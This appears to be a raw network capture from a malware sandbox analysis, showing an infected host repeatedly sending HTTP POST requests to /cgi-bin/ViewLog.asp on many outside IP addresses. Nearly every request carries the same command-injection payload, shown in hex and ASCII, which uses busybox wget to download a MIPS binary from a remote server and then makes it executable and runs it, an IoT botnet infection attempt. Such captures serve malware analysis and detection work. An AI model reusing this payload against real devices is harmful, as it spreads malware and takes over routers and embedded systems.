70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 31 31 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><title>Apache Tomcat/8.5.11 - Error report</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><div class="line"></div><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><hr class="line"><h3>Apache Tomcat/8.5.11</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              110192.168.2.145761031.136.243.2268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:27.874104977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:31.079998970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:37.223642111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:49.255167007 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.574228048 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:02.724066973 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              111192.168.2.145517285.208.121.1198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:27.910203934 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:28.136766911 CET1340INHTTP/1.0 400 Bad Request
                                              Server: squid/3.1.23
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 03:47:48 GMT
                                              Content-Type: text/html
                                              Content-Length: 3167
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              112192.168.2.145720094.121.76.2208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:27.914793968 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              113192.168.2.144941294.122.221.1538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:28.042005062 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              114192.168.2.145937494.122.205.188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:31.534049988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              115192.168.2.145354631.200.124.98080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:31.536499977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              116192.168.2.143301085.105.252.2218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:31.567773104 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              117192.168.2.145778062.171.132.2328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:31.771281004 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              118192.168.2.144323431.136.248.1818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:31.947782040 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:32.519936085 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:33.639914036 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:35.943672895 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:40.551666021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:49.511226892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:07.430366039 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
